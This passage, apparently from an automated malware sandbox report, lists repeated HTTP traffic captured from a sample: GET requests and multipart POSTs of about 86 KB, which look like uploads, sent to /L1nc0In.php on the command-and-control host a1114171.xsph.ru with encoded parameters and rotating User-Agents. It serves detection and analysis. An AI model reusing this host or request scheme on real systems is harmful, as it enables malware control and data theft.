UFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMisHL9JCMYZWaNhlYndmeOl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=d1nIVtGVQJFMJJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIyIjNwQjZykTOmVmZilDZmF2N2ITZldjZ1gzMyImZmJGZlFTM3gTYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryhZ5M9Wqw26useWavUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86516Expect: 100-continue
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=QX9JiI6ISZxgTM3IGOwUWZwIzNwkzYwgTM2E2MkJzN4gDOiNTNlJCLiQzM5ImMmJWZyYTYyMTOyEGM5QGZkVzN4ETN4YjMmFjY4YWMkdjNjVmI6IiMxEWYjZWZmZ2YjJzMkVTMwcTNkZmM0YTMyIGNkRmZjJCLiYGN2UmM4IWM1czY5czYjFTMmdzMkN2MjRzNwQmZyQGOyAzM2IGO0kjI6ICOjJmNmdDZ3MWZjBjN5EGOjZWZ3MDM1ITZhJmYzEDNxIyes0nIRZWOKl3Y0JUaOFTRqlkNJN0T0UlaZ1mSE5keJJTWsZkeOlmTq10aS1mTo50RahXWUp1akRlWrpVbZpmWUp1djpmWwk0Ral2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryvmZ3YPav2beoH3pkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86516Expect: 100-continue
            Source: global trafficHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary5pDZQI1oOHOwFnSmUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86551Expect: 100-continue
            Source: global trafficHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary2ovdIKfbG5MHvCFIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a1114171.xsph.ruContent-Length: 86563Expect: 100-continue
            Source: global trafficHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundarybvsmeehOJIL9xxMCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1114171.xsph.ruContent-Length: 86543Expect: 100-continue
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUS6NGVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhh